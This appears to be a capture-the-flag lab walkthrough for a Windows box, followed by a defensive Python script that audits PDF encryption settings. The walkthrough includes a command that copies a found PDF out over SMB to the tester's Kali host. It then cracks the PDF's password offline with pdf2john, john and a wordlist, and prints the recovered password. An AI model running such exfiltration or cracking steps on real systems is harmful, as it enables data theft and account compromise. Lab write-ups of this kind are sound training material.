PDF File
Checking filesystem after completing the manual enumeration
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/1/2020 12:38 PM ftp
d----- 9/1/2020 12:04 PM PerfLogs
d-r--- 4/14/2022 5:22 AM Program Files
d-r--- 4/14/2022 4:43 AM Program Files (x86)
d-r--- 9/1/2020 12:38 PM Users
d----- 4/14/2022 5:23 AM Windows
-a---- 3/5/2025 12:16 PM 2693 output.txt
PS C:\> ls .\ftp\
Directory: C:\ftp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/1/2020 11:02 AM 46235 Infrastructure.pdf
The C:\ftp directory contains an interesting PDF file: Infrastructure.pdf
PS C:\ftp> copy .\Infrastructure.pdf \\192.168.45.153\smb\
Transferring it to Kali over SMB
Infrastructure.pdf
The Infrastructure.pdf file is password-protected
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ pdf2john Infrastructure.pdf > Infrastructure.pdf.hash
Converting the file into a crackable hash string
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ john ./Infrastructure.pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168 (Infrastructure.pdf)
1g 0:00:00:20 DONE (2025-03-05 21:36) 0.04952g/s 495510p/s 495510c/s 495510C/s arian69..aria_1988
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
Password cracked: ariah4168
Unlocked
The file contains 2 additional hostnames:
nickel-backup
corp-nas
PS C:\Users\ariah> curl http://nickel-backup/backup
curl : The remote name could not be resolved: 'nickel-backup'
At line:1 char:1
+ curl http://nickel-backup/backup
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\Users\ariah> curl http://corp-nas/files
curl : The remote name could not be resolved: 'corp-nas'
At line:1 char:1
+ curl http://corp-nas/files
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
None of them could be resolved from within the target system
Interestingly, it mentions that the web app on the target port 80 is a temporary command endpoint
Note the ? character at the end
Further investigation is needed
Metadata
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ exiftool -a ./Infrastructure.pdf
ExifTool Version Number : 13.10
File Name : Infrastructure.pdf
Directory : .
File Size : 46 kB
File Modification Date/Time : 2020:09:01 21:38:15+02:00
File Access Date/Time : 2025:03:05 21:32:08+01:00
File Inode Change Date/Time : 2025:03:05 21:31:49+01:00
File Permissions : -rwxrwxr-x
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.7
Linearized : No
Encryption : Standard V4.4 (128-bit)
User Access : Print, Modify, Copy, Fill forms, Extract, Print high-res
Warning : Document is password protected (use Password option)
N/A
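Added example, not part of the original notes: a small auditor that reads a PDF's /Encrypt dictionary and reports the fields behind the "revision 4" that john prints and the 128-bit strength exiftool shows, flagging revisions whose password check is cheap to brute-force. The sample bytes are constructed to match those values, and the names `encrypt_dict` and `audit` are hypothetical.

```python
import re
# Constructed sample (not the real Infrastructure.pdf): encryption-related objects only.
SAMPLE = b"""%PDF-1.7
12 0 obj
<< /Filter /Standard /V 4 /R 4 /Length 128 /P -1060
   /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV2 /Length 16 >> >>
   /StmF /StdCF /StrF /StdCF /O <00> /U <00>>>
endobj
trailer
<< /Size 13 /Root 1 0 R /Encrypt 12 0 R >>
"""
# Hex <..> and literal (..) strings; /O and /U bytes may themselves contain "<<" or ">>".
STRING = re.compile(rb"<[0-9A-Fa-f\s]*>|\((?:\\.|[^\\()])*\)", re.S)

def encrypt_dict(pdf):
    """Return (top-level bytes, full bytes) of the indirect /Encrypt dictionary, or None."""
    ref = re.search(rb"/Encrypt\s+(\d+)\s+(\d+)\s+R", pdf)
    obj = ref and re.search(rb"(?<!\d)%d\s+%d\s+obj\s*<<" % (int(ref[1]), int(ref[2])), pdf)
    if not obj:
        return None                       # unencrypted, or the object is missing
    i = start = obj.end() - 2
    depth, top = 0, bytearray()
    while i < len(pdf):
        s = STRING.match(pdf, i)
        if s:
            i = s.end()                   # skip string values whole
        elif pdf.startswith(b"<<", i):
            depth, i = depth + 1, i + 2
        elif pdf.startswith(b">>", i):
            depth, i = depth - 1, i + 2
            if depth == 0:
                return bytes(top), pdf[start:i]
        else:
            top += pdf[i:i + 1] if depth == 1 else b""   # keep outer-dictionary keys only
            i += 1
    return None

def audit(pdf):
    """Summarise the standard security handler settings and flag legacy revisions."""
    found = encrypt_dict(pdf)
    if found is None:
        return {"encrypted": False}
    top, full = found
    def num(key, default):
        m = re.search(rb"/" + key + rb"\s+(-?\d+)", top)
        return int(m[1]) if m else default
    r, cfm = num(b"R", 0), re.search(rb"/CFM\s*/(\w+)", full)
    return {"encrypted": True, "V": num(b"V", 0), "R": r,
            "key_bits": num(b"Length", 40), "cipher": cfm[1].decode() if cfm else "RC4",
            "legacy_kdf": 2 <= r <= 4}    # R 2-4 verify the password with MD5 and RC4 only
```

Running `audit()` over documents on a file share shows which ones rely on a legacy revision, where only the strength of the password itself slows down offline guessing.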